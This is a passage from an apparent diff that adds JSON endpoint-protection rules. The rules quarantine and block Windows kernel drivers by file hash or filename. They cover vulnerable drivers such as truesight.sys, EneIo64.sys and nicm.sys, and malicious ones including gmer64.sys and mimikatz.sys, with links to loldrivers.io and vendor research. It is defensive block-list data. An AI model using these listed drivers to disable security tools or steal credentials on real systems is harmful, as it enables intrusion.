"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808969Z", + "creation_date": "2026-03-23T11:45:31.808971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "b180e7871f6fbdc5fc8eac158a2a529b706bcf5ee60a34865574617de96c2ef5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05a40ccd-8930-52a7-bd25-aef204aa96a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476371Z", + "creation_date": "2026-03-23T11:45:31.476376Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95d668bd3b2131b48b8938b1083279d5c56a29214912556ca22d385d3933a32c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05a5c571-fabf-5a83-81d8-823e0d240d3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821583Z", + "creation_date": "2026-03-23T11:45:30.821586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00d9781d0823ab49505ef9c877aa6fa674e19ecc8b02c39ee2728f298bc92b03", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05b26c98-7a11-5ae0-82c1-cb750152c462", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485451Z", + "creation_date": "2026-03-23T11:45:31.485455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e71d4c24fab2ccffcf694066bb773a7591d682be6644f555df69325cba136f3b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05b2fe91-6886-550d-b2c3-ff25e8135ea3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816549Z", + "creation_date": "2026-03-23T11:45:31.816552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae0ea2defb5399b26e18586ec288ed28fc67b8f8d46fbf3080b6b77d3a6d33f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05b8773f-6980-531a-b1ca-2e4a589c9d2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831658Z", + 
"creation_date": "2026-03-23T11:45:30.831660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "329393b1ef53053dc6ee1202355fda1446e4da10f0488b6107ffff4638b8a010", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05c418e8-7a2e-5be1-ac62-b585d58a8ea2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478346Z", + "creation_date": "2026-03-23T11:45:30.478349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478358Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "775000c4083c8e4dcfc879d83fcd27b40b46820c9834ae4662861386a4d81fe9", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"05c4cbca-396e-52e4-9737-cacdba3d2697", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827107Z", + "creation_date": "2026-03-23T11:45:30.827109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8f3814646ffa58ca9729760b5e0d37396273a0649583cbad1f72909fa452892", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05cf2af0-8a0e-50a9-be37-4e57d392de47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605376Z", + "creation_date": "2026-03-23T11:45:29.605379Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.605384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "kprocesshacker.sys", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05e7fd7d-2794-5963-acae-125e302754e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978773Z", + "creation_date": "2026-03-23T11:45:29.978775Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978781Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3913d9754b78182aa25d38fbd7ea02502bdf1d81e6525ab4b5ffe5f543200478", + "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05f6a82d-e43f-51d3-907a-e07fd0e52c29", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160623Z", + "creation_date": "2026-03-23T11:45:31.160625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "555c77bc0c4f700d6b5dde9e0fade8366187ead215f4a5f15378d6e4395f3d7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05fe4632-59a6-5051-8754-21c32a8cdd48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150106Z", + "creation_date": "2026-03-23T11:45:31.150108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa3511eb499b94646617a2bb4254c5e435bb8fcdc706d6ee0bc3019907c21146", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "060d23a5-7edc-51a4-b217-f718b7894f21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146474Z", + "creation_date": "2026-03-23T11:45:31.146476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62e71e3ec19c2a37a1ab793cb11c84f6de3c2b33765b1eba8b281a55677a97a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06108c7f-8ef1-50d8-9153-e017dc1456a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.830107Z", + "creation_date": "2026-03-23T11:45:31.830109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "654a050581e50d3be2d714ad9012d01f88024298b46c1bae50a556fa16345776", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "061cbb6d-0e35-5277-a7ce-2fdeb0b2988a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143236Z", + "creation_date": "2026-03-23T11:45:31.143238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143243Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f021fb4514087b1b6b11ea6b5a9c5edb589900c61448fff4e213fcea0cba6a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "061fddfc-1028-5872-ad98-bc3b268b440e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618620Z", + "creation_date": "2026-03-23T11:45:29.618622Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618628Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46", + "comment": "Vulnerable Kernel Driver (aka fidpcidrv64.sys) [https://www.loldrivers.io/drivers/a005e057-c84f-47cd-9b4b-5b1e51a06ab4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "062c715f-e8a4-531d-8989-505021f79c89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453103Z", + "creation_date": "2026-03-23T11:45:30.453106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00b3ff11585c2527b9e1c140fd57cb70b18fd0b775ec87e9646603056622a1fd", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0630d6fc-0fd0-5e82-8113-b70a8cf8c82f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825734Z", + "creation_date": "2026-03-23T11:45:31.825736Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34f43f48836d007907b570556ef8374485de44c0772a31b4bfb3da0d9fb0cad7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0635e83a-2aa2-5fb7-91e2-b9a931abca1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618677Z", + "creation_date": "2026-03-23T11:45:29.618679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b62ecd7eccde402456eab582b49705cc77065d7015e7d92bbc06e0fcff097e58", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "064ad0c1-53c5-5170-be1d-a62adc279719", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487943Z", + "creation_date": "2026-03-23T11:45:31.487945Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487959Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "caccf1965f77b49df12b2620952d6806bb8371ec6e344b055cad624318b75b99", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "064da8f4-2bdb-599b-a329-95e44e4a3bb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462469Z", + "creation_date": "2026-03-23T11:45:30.462480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36487117894ca7b93f704e26f22725827f6f04ec3b8c45eaa0d283a11de9a9c3", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06509c64-b674-55d4-9c17-499f4545c9aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616273Z", + "creation_date": "2026-03-23T11:45:29.616275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "065ffb3c-2da3-51ee-be53-e962555d4e02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984244Z", + "creation_date": "2026-03-23T11:45:29.984246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ee33ffd80611a13779df6286c1e04d3c151f1e2f65e3d664a08997fcd098ef3", + "comment": "Vulnerable Kernel Driver (aka EneIo64.sys) 
[https://www.loldrivers.io/drivers/90ecbbf7-b02f-424d-8b7d-56cc9e3b5873/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06615c0c-228f-512b-8133-3a258f2de2cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143687Z", + "creation_date": "2026-03-23T11:45:32.143689Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f085bc766d865fa012163ed7c044af25285525b1276b6cef2085efab78e9b66", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "06687483-5a24-5d21-ac75-81bdb46e0b2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829628Z", + "creation_date": "2026-03-23T11:45:31.829630Z", + "enabled": true, + 
